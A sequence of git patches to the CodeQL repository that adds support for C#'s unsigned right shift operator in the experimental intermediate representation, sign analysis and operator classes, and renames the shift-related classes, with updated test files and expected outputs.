[PATCH 227/381] C#: Auto format test file and update expected test output. --- .../test/experimental/ir/ir/PrintAst.expected | 76 ++++++++--------- csharp/ql/test/experimental/ir/ir/assignop.cs | 22 ++--- .../test/experimental/ir/ir/raw_ir.expected | 82 +++++++++---------- 3 files changed, 91 insertions(+), 89 deletions(-) diff --git a/csharp/ql/test/experimental/ir/ir/PrintAst.expected b/csharp/ql/test/experimental/ir/ir/PrintAst.expected index 480b63f4241..e15284672aa 100644 --- a/csharp/ql/test/experimental/ir/ir/PrintAst.expected +++ b/csharp/ql/test/experimental/ir/ir/PrintAst.expected @@ -118,59 +118,59 @@ array.cs: # 20| 0: [IntLiteral] 1 assignop.cs: # 3| [Class] AssignOp -# 4| 5: [Method] Main -# 4| -1: [TypeMention] Void -# 4| 4: [BlockStmt] {...} -# 5| 0: [LocalVariableDeclStmt] ... ...; -# 5| 0: [LocalVariableDeclAndInitExpr] Int32 a = ... -# 5| -1: [TypeMention] int -# 5| 0: [LocalVariableAccess] access to local variable a -# 5| 1: [IntLiteral] 1 -# 6| 1: [LocalVariableDeclStmt] ... ...; -# 6| 0: [LocalVariableDeclAndInitExpr] Int32 c = ... -# 6| -1: [TypeMention] int -# 6| 0: [LocalVariableAccess] access to local variable c -# 6| 1: [IntLiteral] 1 -# 8| 2: [ExprStmt] ...; -# 8| 0: [AssignAddExpr] ... += ... +# 5| 5: [Method] Main +# 5| -1: [TypeMention] Void +# 6| 4: [BlockStmt] {...} +# 7| 0: [LocalVariableDeclStmt] ... ...; +# 7| 0: [LocalVariableDeclAndInitExpr] Int32 a = ... +# 7| -1: [TypeMention] int +# 7| 0: [LocalVariableAccess] access to local variable a +# 7| 1: [IntLiteral] 1 +# 8| 1: [LocalVariableDeclStmt] ... ...; +# 8| 0: [LocalVariableDeclAndInitExpr] Int32 c = ... +# 8| -1: [TypeMention] int # 8| 0: [LocalVariableAccess] access to local variable c -# 8| 1: [LocalVariableAccess] access to local variable a -# 9| 3: [ExprStmt] ...; -# 9| 0: [AssignSubExpr] ... -= ... -# 9| 0: [LocalVariableAccess] access to local variable c -# 9| 1: [LocalVariableAccess] access to local variable a -# 10| 4: [ExprStmt] ...; -# 10| 0: [AssignMulExpr] ... *= ... +# 8| 1: [IntLiteral] 1 +# 10| 2: [ExprStmt] ...; +# 10| 0: [AssignAddExpr] ... += ... # 10| 0: [LocalVariableAccess] access to local variable c # 10| 1: [LocalVariableAccess] access to local variable a -# 11| 5: [ExprStmt] ...; -# 11| 0: [AssignDivExpr] ... /= ... +# 11| 3: [ExprStmt] ...; +# 11| 0: [AssignSubExpr] ... -= ... # 11| 0: [LocalVariableAccess] access to local variable c # 11| 1: [LocalVariableAccess] access to local variable a -# 12| 6: [ExprStmt] ...; -# 12| 0: [AssignRemExpr] ... %= ... +# 12| 4: [ExprStmt] ...; +# 12| 0: [AssignMulExpr] ... *= ... # 12| 0: [LocalVariableAccess] access to local variable c # 12| 1: [LocalVariableAccess] access to local variable a -# 13| 7: [ExprStmt] ...; -# 13| 0: [AssignLeftShiftExpr] ... <<= ... +# 13| 5: [ExprStmt] ...; +# 13| 0: [AssignDivExpr] ... /= ... # 13| 0: [LocalVariableAccess] access to local variable c -# 13| 1: [IntLiteral] 2 -# 14| 8: [ExprStmt] ...; -# 14| 0: [AssignRightShiftExpr] ... >>= ... +# 13| 1: [LocalVariableAccess] access to local variable a +# 14| 6: [ExprStmt] ...; +# 14| 0: [AssignRemExpr] ... %= ... # 14| 0: [LocalVariableAccess] access to local variable c -# 14| 1: [IntLiteral] 2 -# 15| 9: [ExprStmt] ...; -# 15| 0: [AssignAndExpr] ... &= ... +# 14| 1: [LocalVariableAccess] access to local variable a +# 15| 7: [ExprStmt] ...; +# 15| 0: [AssignLeftShiftExpr] ... <<= ... # 15| 0: [LocalVariableAccess] access to local variable c # 15| 1: [IntLiteral] 2 -# 16| 10: [ExprStmt] ...; -# 16| 0: [AssignXorExpr] ... ^= ... +# 16| 8: [ExprStmt] ...; +# 16| 0: [AssignRightShiftExpr] ... >>= ... # 16| 0: [LocalVariableAccess] access to local variable c # 16| 1: [IntLiteral] 2 -# 17| 11: [ExprStmt] ...; -# 17| 0: [AssignOrExpr] ... |= ... +# 17| 9: [ExprStmt] ...; +# 17| 0: [AssignAndExpr] ... &= ... # 17| 0: [LocalVariableAccess] access to local variable c # 17| 1: [IntLiteral] 2 +# 18| 10: [ExprStmt] ...; +# 18| 0: [AssignXorExpr] ... ^= ... +# 18| 0: [LocalVariableAccess] access to local variable c +# 18| 1: [IntLiteral] 2 +# 19| 11: [ExprStmt] ...; +# 19| 0: [AssignOrExpr] ... |= ... +# 19| 0: [LocalVariableAccess] access to local variable c +# 19| 1: [IntLiteral] 2 casts.cs: # 1| [Class] Casts_A # 5| [Class] Casts_B diff --git a/csharp/ql/test/experimental/ir/ir/assignop.cs b/csharp/ql/test/experimental/ir/ir/assignop.cs index f5c2a6fa19d..d672a6d5022 100644 --- a/csharp/ql/test/experimental/ir/ir/assignop.cs +++ b/csharp/ql/test/experimental/ir/ir/assignop.cs @@ -1,19 +1,21 @@ using System; -class AssignOp { - static void Main() { +class AssignOp +{ + static void Main() + { int a = 1; int c = 1; - - c += a; + + c += a; c -= a; - c *= a; + c *= a; c /= a; - c %= a; - c <<= 2; - c >>= 2; - c &= 2; - c ^= 2; + c %= a; + c <<= 2; + c >>= 2; + c &= 2; + c ^= 2; c |= 2; } } diff --git a/csharp/ql/test/experimental/ir/ir/raw_ir.expected b/csharp/ql/test/experimental/ir/ir/raw_ir.expected index bf639694da5..39b8d6323ff 100644 --- a/csharp/ql/test/experimental/ir/ir/raw_ir.expected +++ b/csharp/ql/test/experimental/ir/ir/raw_ir.expected @@ -145,74 +145,74 @@ array.cs: # 13| v13_6(Void) = ExitFunction : assignop.cs: -# 4| System.Void AssignOp.Main() -# 4| Block 0 -# 4| v4_1(Void) = EnterFunction : -# 4| mu4_2() = AliasedDefinition : -# 5| r5_1(glval) = VariableAddress[a] : -# 5| r5_2(Int32) = Constant[1] : -# 5| mu5_3(Int32) = Store[a] : &:r5_1, r5_2 -# 6| r6_1(glval) = VariableAddress[c] : -# 6| r6_2(Int32) = Constant[1] : -# 6| mu6_3(Int32) = Store[c] : &:r6_1, r6_2 -# 8| r8_1(glval) = VariableAddress[a] : -# 8| r8_2(Int32) = Load[a] : &:r8_1, ~m? -# 8| r8_3(glval) = VariableAddress[c] : -# 8| r8_4(Int32) = Load[c] : &:r8_3, ~m? -# 8| r8_5(Int32) = Add : r8_4, r8_2 -# 8| mu8_6(Int32) = Store[c] : &:r8_3, r8_5 -# 9| r9_1(glval) = VariableAddress[a] : -# 9| r9_2(Int32) = Load[a] : &:r9_1, ~m? -# 9| r9_3(glval) = VariableAddress[c] : -# 9| r9_4(Int32) = Load[c] : &:r9_3, ~m? -# 9| r9_5(Int32) = Sub : r9_4, r9_2 -# 9| mu9_6(Int32) = Store[c] : &:r9_3, r9_5 +# 5| System.Void AssignOp.Main() +# 5| Block 0 +# 5| v5_1(Void) = EnterFunction : +# 5| mu5_2() = AliasedDefinition : +# 7| r7_1(glval) = VariableAddress[a] : +# 7| r7_2(Int32) = Constant[1] : +# 7| mu7_3(Int32) = Store[a] : &:r7_1, r7_2 +# 8| r8_1(glval) = VariableAddress[c] : +# 8| r8_2(Int32) = Constant[1] : +# 8| mu8_3(Int32) = Store[c] : &:r8_1, r8_2 # 10| r10_1(glval) = VariableAddress[a] : # 10| r10_2(Int32) = Load[a] : &:r10_1, ~m? # 10| r10_3(glval) = VariableAddress[c] : # 10| r10_4(Int32) = Load[c] : &:r10_3, ~m? -# 10| r10_5(Int32) = Mul : r10_4, r10_2 +# 10| r10_5(Int32) = Add : r10_4, r10_2 # 10| mu10_6(Int32) = Store[c] : &:r10_3, r10_5 # 11| r11_1(glval) = VariableAddress[a] : # 11| r11_2(Int32) = Load[a] : &:r11_1, ~m? # 11| r11_3(glval) = VariableAddress[c] : # 11| r11_4(Int32) = Load[c] : &:r11_3, ~m? -# 11| r11_5(Int32) = Div : r11_4, r11_2 +# 11| r11_5(Int32) = Sub : r11_4, r11_2 # 11| mu11_6(Int32) = Store[c] : &:r11_3, r11_5 # 12| r12_1(glval) = VariableAddress[a] : # 12| r12_2(Int32) = Load[a] : &:r12_1, ~m? # 12| r12_3(glval) = VariableAddress[c] : # 12| r12_4(Int32) = Load[c] : &:r12_3, ~m? -# 12| r12_5(Int32) = Rem : r12_4, r12_2 +# 12| r12_5(Int32) = Mul : r12_4, r12_2 # 12| mu12_6(Int32) = Store[c] : &:r12_3, r12_5 -# 13| r13_1(Int32) = Constant[2] : -# 13| r13_2(glval) = VariableAddress[c] : -# 13| r13_3(Int32) = Load[c] : &:r13_2, ~m? -# 13| r13_4(Int32) = ShiftLeft : r13_3, r13_1 -# 13| mu13_5(Int32) = Store[c] : &:r13_2, r13_4 -# 14| r14_1(Int32) = Constant[2] : -# 14| r14_2(glval) = VariableAddress[c] : -# 14| r14_3(Int32) = Load[c] : &:r14_2, ~m? -# 14| r14_4(Int32) = ShiftRight : r14_3, r14_1 -# 14| mu14_5(Int32) = Store[c] : &:r14_2, r14_4 +# 13| r13_1(glval) = VariableAddress[a] : +# 13| r13_2(Int32) = Load[a] : &:r13_1, ~m? +# 13| r13_3(glval) = VariableAddress[c] : +# 13| r13_4(Int32) = Load[c] : &:r13_3, ~m? +# 13| r13_5(Int32) = Div : r13_4, r13_2 +# 13| mu13_6(Int32) = Store[c] : &:r13_3, r13_5 +# 14| r14_1(glval) = VariableAddress[a] : +# 14| r14_2(Int32) = Load[a] : &:r14_1, ~m? +# 14| r14_3(glval) = VariableAddress[c] : +# 14| r14_4(Int32) = Load[c] : &:r14_3, ~m? +# 14| r14_5(Int32) = Rem : r14_4, r14_2 +# 14| mu14_6(Int32) = Store[c] : &:r14_3, r14_5 # 15| r15_1(Int32) = Constant[2] : # 15| r15_2(glval) = VariableAddress[c] : # 15| r15_3(Int32) = Load[c] : &:r15_2, ~m? -# 15| r15_4(Int32) = BitAnd : r15_3, r15_1 +# 15| r15_4(Int32) = ShiftLeft : r15_3, r15_1 # 15| mu15_5(Int32) = Store[c] : &:r15_2, r15_4 # 16| r16_1(Int32) = Constant[2] : # 16| r16_2(glval) = VariableAddress[c] : # 16| r16_3(Int32) = Load[c] : &:r16_2, ~m? -# 16| r16_4(Int32) = BitXor : r16_3, r16_1 +# 16| r16_4(Int32) = ShiftRight : r16_3, r16_1 # 16| mu16_5(Int32) = Store[c] : &:r16_2, r16_4 # 17| r17_1(Int32) = Constant[2] : # 17| r17_2(glval) = VariableAddress[c] : # 17| r17_3(Int32) = Load[c] : &:r17_2, ~m? -# 17| r17_4(Int32) = BitOr : r17_3, r17_1 +# 17| r17_4(Int32) = BitAnd : r17_3, r17_1 # 17| mu17_5(Int32) = Store[c] : &:r17_2, r17_4 -# 4| v4_3(Void) = ReturnVoid : -# 4| v4_4(Void) = AliasedUse : ~m? -# 4| v4_5(Void) = ExitFunction : +# 18| r18_1(Int32) = Constant[2] : +# 18| r18_2(glval) = VariableAddress[c] : +# 18| r18_3(Int32) = Load[c] : &:r18_2, ~m? +# 18| r18_4(Int32) = BitXor : r18_3, r18_1 +# 18| mu18_5(Int32) = Store[c] : &:r18_2, r18_4 +# 19| r19_1(Int32) = Constant[2] : +# 19| r19_2(glval) = VariableAddress[c] : +# 19| r19_3(Int32) = Load[c] : &:r19_2, ~m? +# 19| r19_4(Int32) = BitOr : r19_3, r19_1 +# 19| mu19_5(Int32) = Store[c] : &:r19_2, r19_4 +# 5| v5_3(Void) = ReturnVoid : +# 5| v5_4(Void) = AliasedUse : ~m? +# 5| v5_5(Void) = ExitFunction : casts.cs: # 11| System.Void Casts.Main() From 5bb8f8ed5cdafd9bcbb3e3e744a793c30e4fb168 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Jan 2023 15:06:32 +0100 Subject: [PATCH 228/381] C#: Support for unsigned shift right in the experimental intermediate representation. --- .../ql/src/experimental/ir/implementation/Opcode.qll | 10 ++++++++++ .../ir/implementation/raw/Instruction.qll | 11 +++++++++++ .../ir/implementation/raw/internal/TranslatedExpr.qll | 7 ++++++- .../ir/implementation/unaliased_ssa/Instruction.qll | 11 +++++++++++ .../experimental/ir/rangeanalysis/SignAnalysis.qll | 2 ++ 5 files changed, 40 insertions(+), 1 deletion(-) diff --git a/csharp/ql/src/experimental/ir/implementation/Opcode.qll b/csharp/ql/src/experimental/ir/implementation/Opcode.qll index c4134d240ab..b4def7fe4ae 100644 --- a/csharp/ql/src/experimental/ir/implementation/Opcode.qll +++ b/csharp/ql/src/experimental/ir/implementation/Opcode.qll @@ -30,6 +30,7 @@ private newtype TOpcode = TNegate() or TShiftLeft() or TShiftRight() or + TUnsignedShiftRight() or TBitAnd() or TBitOr() or TBitXor() or @@ -652,6 +653,15 @@ module Opcode { final override string toString() { result = "ShiftRight" } } + /** + * The `Opcode` for a `UnsignedShiftRightInstruction`. + * + * See the `UnsignedShiftRightInstruction` documentation for more details. + */ + class UnsignedShiftRight extends BinaryBitwiseOpcode, TUnsignedShiftRight { + final override string toString() { result = "UnsignedShiftRight" } + } + /** * The `Opcode` for a `BitAndInstruction`. * diff --git a/csharp/ql/src/experimental/ir/implementation/raw/Instruction.qll b/csharp/ql/src/experimental/ir/implementation/raw/Instruction.qll index 7afe954023b..0aa7c552638 100644 --- a/csharp/ql/src/experimental/ir/implementation/raw/Instruction.qll +++ b/csharp/ql/src/experimental/ir/implementation/raw/Instruction.qll @@ -1204,6 +1204,17 @@ class ShiftRightInstruction extends BinaryBitwiseInstruction { ShiftRightInstruction() { this.getOpcode() instanceof Opcode::ShiftRight } } +/** + * An instruction that shifts its left operand to the right by the number of bits specified by its + * right operand. + * + * Both operands must have an integer type. The result has the same type as the left operand. + * The leftmost bits are zero-filled. + */ +class UnsignedShiftRightInstruction extends BinaryBitwiseInstruction { + UnsignedShiftRightInstruction() { this.getOpcode() instanceof Opcode::UnsignedShiftRight } +} + /** * An instruction that performs a binary arithmetic operation involving at least one pointer * operand. diff --git a/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll b/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll index 56c2621afb9..06391c010b4 100644 --- a/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll +++ b/csharp/ql/src/experimental/ir/implementation/raw/internal/TranslatedExpr.qll @@ -1095,6 +1095,8 @@ private Opcode binaryBitwiseOpcode(BinaryBitwiseOperation expr) { or expr instanceof RightShiftExpr and result instanceof Opcode::ShiftRight or + expr instanceof UnsignedRightShiftExpr and result instanceof Opcode::UnsignedShiftRight + or expr instanceof BitwiseAndExpr and result instanceof Opcode::BitAnd or expr instanceof BitwiseOrExpr and result instanceof Opcode::BitOr @@ -1378,7 +1380,8 @@ class TranslatedAssignOperation extends TranslatedAssignment { private Type getConvertedLeftOperandType() { if expr instanceof AssignLeftShiftExpr or - expr instanceof AssignRightShiftExpr + expr instanceof AssignRightShiftExpr or + expr instanceof AssignUnsighedRightShiftExpr then result = this.getLeftOperand().getResultType() else // The right operand has already been converted to the type of the op. @@ -1419,6 +1422,8 @@ class TranslatedAssignOperation extends TranslatedAssignment { expr instanceof AssignLeftShiftExpr and result instanceof Opcode::ShiftLeft or expr instanceof AssignRightShiftExpr and result instanceof Opcode::ShiftRight + or + expr instanceof AssignUnsighedRightShiftExpr and result instanceof Opcode::UnsignedShiftRight } override predicate hasInstruction(Opcode opcode, InstructionTag tag, CSharpType resultType) { diff --git a/csharp/ql/src/experimental/ir/implementation/unaliased_ssa/Instruction.qll b/csharp/ql/src/experimental/ir/implementation/unaliased_ssa/Instruction.qll index 7afe954023b..0aa7c552638 100644 --- a/csharp/ql/src/experimental/ir/implementation/unaliased_ssa/Instruction.qll +++ b/csharp/ql/src/experimental/ir/implementation/unaliased_ssa/Instruction.qll @@ -1204,6 +1204,17 @@ class ShiftRightInstruction extends BinaryBitwiseInstruction { ShiftRightInstruction() { this.getOpcode() instanceof Opcode::ShiftRight } } +/** + * An instruction that shifts its left operand to the right by the number of bits specified by its + * right operand. + * + * Both operands must have an integer type. The result has the same type as the left operand. + * The leftmost bits are zero-filled. + */ +class UnsignedShiftRightInstruction extends BinaryBitwiseInstruction { + UnsignedShiftRightInstruction() { this.getOpcode() instanceof Opcode::UnsignedShiftRight } +} + /** * An instruction that performs a binary arithmetic operation involving at least one pointer * operand. diff --git a/csharp/ql/src/experimental/ir/rangeanalysis/SignAnalysis.qll b/csharp/ql/src/experimental/ir/rangeanalysis/SignAnalysis.qll index 44548e0517a..b74f7c90db5 100644 --- a/csharp/ql/src/experimental/ir/rangeanalysis/SignAnalysis.qll +++ b/csharp/ql/src/experimental/ir/rangeanalysis/SignAnalysis.qll @@ -522,6 +522,8 @@ module SignAnalysisCached { i instanceof ShiftRightInstruction and not i.getResultType().(IntegralType) instanceof SignedIntegralType and result = s1.urshift(s2) + or + i instanceof UnsignedShiftRightInstruction and result = s1.urshift(s2) ) or // use hasGuard here? From d92b226041bbc70157f1d1aebfd183b41080757a Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Jan 2023 15:07:18 +0100 Subject: [PATCH 229/381] C#: Add test example for unsigned right shift assignment in intermediate representation. --- csharp/ql/test/experimental/ir/ir/PrintAst.expected | 4 ++++ csharp/ql/test/experimental/ir/ir/assignop.cs | 1 + csharp/ql/test/experimental/ir/ir/raw_ir.expected | 5 +++++ 3 files changed, 10 insertions(+) diff --git a/csharp/ql/test/experimental/ir/ir/PrintAst.expected b/csharp/ql/test/experimental/ir/ir/PrintAst.expected index e15284672aa..cc96a82bbc1 100644 --- a/csharp/ql/test/experimental/ir/ir/PrintAst.expected +++ b/csharp/ql/test/experimental/ir/ir/PrintAst.expected @@ -171,6 +171,10 @@ assignop.cs: # 19| 0: [AssignOrExpr] ... |= ... # 19| 0: [LocalVariableAccess] access to local variable c # 19| 1: [IntLiteral] 2 +# 20| 12: [ExprStmt] ...; +# 20| 0: [AssignUnsighedRightShiftExpr] ... >>>= ... +# 20| 0: [LocalVariableAccess] access to local variable c +# 20| 1: [IntLiteral] 2 casts.cs: # 1| [Class] Casts_A # 5| [Class] Casts_B diff --git a/csharp/ql/test/experimental/ir/ir/assignop.cs b/csharp/ql/test/experimental/ir/ir/assignop.cs index d672a6d5022..21fdfccbcf9 100644 --- a/csharp/ql/test/experimental/ir/ir/assignop.cs +++ b/csharp/ql/test/experimental/ir/ir/assignop.cs @@ -17,5 +17,6 @@ class AssignOp c &= 2; c ^= 2; c |= 2; + c >>>= 2; } } diff --git a/csharp/ql/test/experimental/ir/ir/raw_ir.expected b/csharp/ql/test/experimental/ir/ir/raw_ir.expected index 39b8d6323ff..2461e6602b9 100644 --- a/csharp/ql/test/experimental/ir/ir/raw_ir.expected +++ b/csharp/ql/test/experimental/ir/ir/raw_ir.expected @@ -210,6 +210,11 @@ assignop.cs: # 19| r19_3(Int32) = Load[c] : &:r19_2, ~m? # 19| r19_4(Int32) = BitOr : r19_3, r19_1 # 19| mu19_5(Int32) = Store[c] : &:r19_2, r19_4 +# 20| r20_1(Int32) = Constant[2] : +# 20| r20_2(glval) = VariableAddress[c] : +# 20| r20_3(Int32) = Load[c] : &:r20_2, ~m? +# 20| r20_4(Int32) = UnsignedShiftRight : r20_3, r20_1 +# 20| mu20_5(Int32) = Store[c] : &:r20_2, r20_4 # 5| v5_3(Void) = ReturnVoid : # 5| v5_4(Void) = AliasedUse : ~m? # 5| v5_5(Void) = ExitFunction : From f48eda829ff67da79ec651d03c071c5d5caf5af1 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Jan 2023 15:31:01 +0100 Subject: [PATCH 230/381] C#: Rename some of the TBinarySignOperation constructors. --- .../dataflow/internal/rangeanalysis/RangeUtils.qll | 6 +++--- .../csharp/dataflow/internal/rangeanalysis/Sign.qll | 12 ++++++------ 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll index 69054d88205..fe4505b6e2e 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/RangeUtils.qll @@ -394,21 +394,21 @@ module ExprNode { class LeftShiftExpr extends BinaryOperation { override CS::LeftShiftExpr e; - override TLShiftOp getOp() { any() } + override TLeftShiftOp getOp() { any() } } /** A right-shift operation. */ class RightShiftExpr extends BinaryOperation { override CS::RightShiftExpr e; - override TRShiftOp getOp() { any() } + override TRightShiftOp getOp() { any() } } /** An unsigned right-shift operation. */ class UnsignedRightShiftExpr extends BinaryOperation { override CS::UnsignedRightShiftExpr e; - override TURShiftOp getOp() { any() } + override TUnsignedRightShiftOp getOp() { any() } } /** A conditional expression. */ diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/Sign.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/Sign.qll index b2058a27114..649b4216996 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/Sign.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/rangeanalysis/Sign.qll @@ -18,9 +18,9 @@ newtype TBinarySignOperation = TBitAndOp() or TBitOrOp() or TBitXorOp() or - TLShiftOp() or - TRShiftOp() or - TURShiftOp() + TLeftShiftOp() or + TRightShiftOp() or + TUnsignedRightShiftOp() /** Class representing expression signs (+, -, 0). */ class Sign extends TSign { @@ -271,10 +271,10 @@ class Sign extends TSign { or op = TBitXorOp() and result = bitxor(s) or - op = TLShiftOp() and result = lshift(s) + op = TLeftShiftOp() and result = lshift(s) or - op = TRShiftOp() and result = rshift(s) + op = TRightShiftOp() and result = rshift(s) or - op = TURShiftOp() and result = urshift(s) + op = TUnsignedRightShiftOp() and result = urshift(s) } } From 148dc6de5a604685e284c10ba588dc9409406970 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Jan 2023 15:36:03 +0100 Subject: [PATCH 231/381] C#: Rename shift operator classes. --- csharp/ql/lib/semmle/code/csharp/Callable.qll | 22 ++++++++++++------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/Callable.qll b/csharp/ql/lib/semmle/code/csharp/Callable.qll index bc8e1294adb..3f19198085e 100644 --- a/csharp/ql/lib/semmle/code/csharp/Callable.qll +++ b/csharp/ql/lib/semmle/code/csharp/Callable.qll @@ -636,8 +636,8 @@ class TrueOperator extends UnaryOperator { * (`SubOperator`), a multiplication operator (`MulOperator`), a division * operator (`DivOperator`), a remainder operator (`RemOperator`), an and * operator (`AndOperator`), an or operator (`OrOperator`), an xor - * operator (`XorOperator`), a left shift operator (`LShiftOperator`), - * a right shift operator (`RShiftOperator`), an equals operator (`EQOperator`), + * operator (`XorOperator`), a left shift operator (`LeftShiftOperator`), + * a right shift operator (`RightShiftOperator`), an equals operator (`EQOperator`), * a not equals operator (`NEOperator`), a lesser than operator (`LTOperator`), * a greater than operator (`GTOperator`), a less than or equals operator * (`LEOperator`), or a greater than or equals operator (`GEOperator`). @@ -791,14 +791,17 @@ class XorOperator extends BinaryOperator { * } * ``` */ -class LShiftOperator extends BinaryOperator { - LShiftOperator() { this.getName() = "<<" } +class LeftShiftOperator extends BinaryOperator { + LeftShiftOperator() { this.getName() = "<<" } override string getFunctionName() { result = "op_LeftShift" } - override string getAPrimaryQlClass() { result = "LShiftOperator" } + override string getAPrimaryQlClass() { result = "LeftShiftOperator" } } +/** DEPRECATED: Alias for LeftShiftOperator. */ +deprecated class LShiftOperator = LeftShiftOperator; + /** * A user-defined right shift operator (`>>`), for example * @@ -808,14 +811,17 @@ class LShiftOperator extends BinaryOperator { * } * ``` */ -class RShiftOperator extends BinaryOperator { - RShiftOperator() { this.getName() = ">>" } +class RightShiftOperator extends BinaryOperator { + RightShiftOperator() { this.getName() = ">>" } override string getFunctionName() { result = "op_RightShift" } - override string getAPrimaryQlClass() { result = "RShiftOperator" } + override string getAPrimaryQlClass() { result = "RightShiftOperator" } } +/** DEPRECATED: Alias for RightShiftOperator. */ +deprecated class RShiftOperator = RightShiftOperator; + /** * A user-defined equals operator (`==`), for example * From 30738103f05ce5e5201787e0ee4bdd4c382e90ad Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Jan 2023 15:47:32 +0100 Subject: [PATCH 232/381] C#: Add unsigned right shift operator class. --- csharp/ql/lib/semmle/code/csharp/Callable.qll | 20 ++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/csharp/ql/lib/semmle/code/csharp/Callable.qll b/csharp/ql/lib/semmle/code/csharp/Callable.qll index 3f19198085e..ea88f814bce 100644 --- a/csharp/ql/lib/semmle/code/csharp/Callable.qll +++ b/csharp/ql/lib/semmle/code/csharp/Callable.qll @@ -637,7 +637,8 @@ class TrueOperator extends UnaryOperator { * operator (`DivOperator`), a remainder operator (`RemOperator`), an and * operator (`AndOperator`), an or operator (`OrOperator`), an xor * operator (`XorOperator`), a left shift operator (`LeftShiftOperator`), - * a right shift operator (`RightShiftOperator`), an equals operator (`EQOperator`), + * a right shift operator (`RightShiftOperator`), an unsigned right shift + * operator(`UnsignedRightShiftOperator`), an equals operator (`EQOperator`), * a not equals operator (`NEOperator`), a lesser than operator (`LTOperator`), * a greater than operator (`GTOperator`), a less than or equals operator * (`LEOperator`), or a greater than or equals operator (`GEOperator`). @@ -822,6 +823,23 @@ class RightShiftOperator extends BinaryOperator { /** DEPRECATED: Alias for RightShiftOperator. */ deprecated class RShiftOperator = RightShiftOperator; +/** + * A user-defined unsigned right shift operator (`>>>`), for example + * + * ```csharp + * public static Widget operator >>>(Widget lhs, Widget rhs) { + * ... + * } + * ``` + */ +class UnsignedRightShiftOperator extends BinaryOperator { + UnsignedRightShiftOperator() { this.getName() = ">>>" } + + override string getFunctionName() { result = "op_UnsignedRightShift" } + + override string getAPrimaryQlClass() { result = "UnsignedRightShiftOperator" } +} + /** * A user-defined equals operator (`==`), for example * From 49a87e152a2936c7f0f3fd52ecbc0174f1861577 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Jan 2023 15:48:07 +0100 Subject: [PATCH 233/381] C#: Add unsigned right shift operator test case. --- csharp/ql/test/library-tests/csharp11/Operators.cs | 5 +++++ csharp/ql/test/library-tests/csharp11/operators.expected | 2 ++ csharp/ql/test/library-tests/csharp11/operators.ql | 6 ++++++ 3 files changed, 13 insertions(+) diff --git a/csharp/ql/test/library-tests/csharp11/Operators.cs b/csharp/ql/test/library-tests/csharp11/Operators.cs index 9208654629b..d5c4f8be091 100644 --- a/csharp/ql/test/library-tests/csharp11/Operators.cs +++ b/csharp/ql/test/library-tests/csharp11/Operators.cs @@ -12,4 +12,9 @@ public class MyClass var z = -4; z >>>= 5; } +} + +public class MyOperatorClass +{ + public static MyOperatorClass operator >>>(MyOperatorClass a, MyOperatorClass b) { return null; } } \ No newline at end of file diff --git a/csharp/ql/test/library-tests/csharp11/operators.expected b/csharp/ql/test/library-tests/csharp11/operators.expected index 3b700fc2f4c..2c7bda6800d 100644 --- a/csharp/ql/test/library-tests/csharp11/operators.expected +++ b/csharp/ql/test/library-tests/csharp11/operators.expected @@ -4,3 +4,5 @@ binarybitwise | Operators.cs:13:9:13:16 | ... >>> ... | Operators.cs:13:9:13:9 | access to local variable z | Operators.cs:13:16:13:16 | 5 | >>> | UnsignedRightShiftExpr | assignbitwise | Operators.cs:13:9:13:16 | ... >>>= ... | Operators.cs:13:9:13:9 | access to local variable z | Operators.cs:13:16:13:16 | 5 | >>>= | AssignUnsighedRightShiftExpr | +userdefined +| Operators.cs:19:44:19:46 | >>> | op_UnsignedRightShift | UnsignedRightShiftOperator | diff --git a/csharp/ql/test/library-tests/csharp11/operators.ql b/csharp/ql/test/library-tests/csharp11/operators.ql index f70897e8da5..607efac0c26 100644 --- a/csharp/ql/test/library-tests/csharp11/operators.ql +++ b/csharp/ql/test/library-tests/csharp11/operators.ql @@ -19,3 +19,9 @@ query predicate assignbitwise( name = op.getOperator() and qlclass = op.getAPrimaryQlClass() } + +query predicate userdefined(Operator op, string fname, string qlclass) { + op.getFile().getStem() = "Operators" and + fname = op.getFunctionName() and + qlclass = op.getAPrimaryQlClass() +} From 5c466f331912ac195a844e4fa8957083d9b4ba2c Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Tue, 10 Jan 2023 09:42:20 +0100 Subject: [PATCH 234/381] Java: Sync files and update other relavant files related to the new naming of shift. --- java/ql/lib/semmle/code/java/Expr.qll | 48 +++++++++++++------ .../code/java/dataflow/ModulusAnalysis.qll | 2 +- .../code/java/dataflow/RangeAnalysis.qll | 12 ++--- .../rangeanalysis/ModulusAnalysisSpecific.qll | 8 ++-- .../dataflow/internal/rangeanalysis/Sign.qll | 12 ++--- .../rangeanalysis/SignAnalysisSpecific.qll | 24 +++++----- .../Arithmetic/LShiftLargerThanTypeWidth.ql | 2 +- .../WhitespaceContradictsPrecedence.ql | 6 +-- .../Comparison/UselessComparisonTest.ql | 4 +- .../Security/CWE/CWE-190/ArithmeticCommon.qll | 6 +-- .../CWE/CWE-681/NumericCastCommon.qll | 8 ++-- .../library-tests/exprs/PrintAst.expected | 12 ++--- .../kotlin/library-tests/exprs/exprs.expected | 12 ++--- .../library-tests/constants/PrintAst.expected | 8 ++-- 14 files changed, 91 insertions(+), 73 deletions(-) diff --git 